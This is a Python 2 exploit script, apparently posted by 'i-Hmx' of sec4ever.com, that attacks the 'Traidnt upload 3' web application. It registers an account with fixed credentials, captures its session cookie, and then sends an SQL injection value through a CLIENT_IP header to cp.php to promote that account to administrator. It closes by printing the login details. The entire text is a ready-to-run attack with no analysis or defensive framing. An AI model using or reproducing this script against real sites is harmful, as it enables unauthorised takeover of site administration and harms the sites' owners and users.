#!/usr/bin/python import urllib2 import sys print """ +-------------------------------------------+ | Traidnt upload 3 - Admin add Exploit | | By i-Hmx | | sec4ever.com | | n0p1337@gmail.com | +-------------------------------------------+""" target=str(raw_input("[*] Enter Target <http://site.com/path> # ")) print "[+] Adding new user" try: register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1337@gmail.com&password=sec4ever&rules=faris rules") except: print "[-] Exception happened :(" sys.exit() print "[+] Grabbing Cookies" login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever") headers=login.headers.items() for header in headers: if header[0]=="set-cookie": cookies=header[1] if cookies.find("upload_sid")==-1: print "[-] Exploitation Failed" sys.exit() print "[+] Upgrading privelages" req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"}) upgrade=urllib2.urlopen(req) print "[+] Login with the following data\n + User : farsawy\n + pass : sec4ever\n + Probably you are an admin now ;)" sys.exit()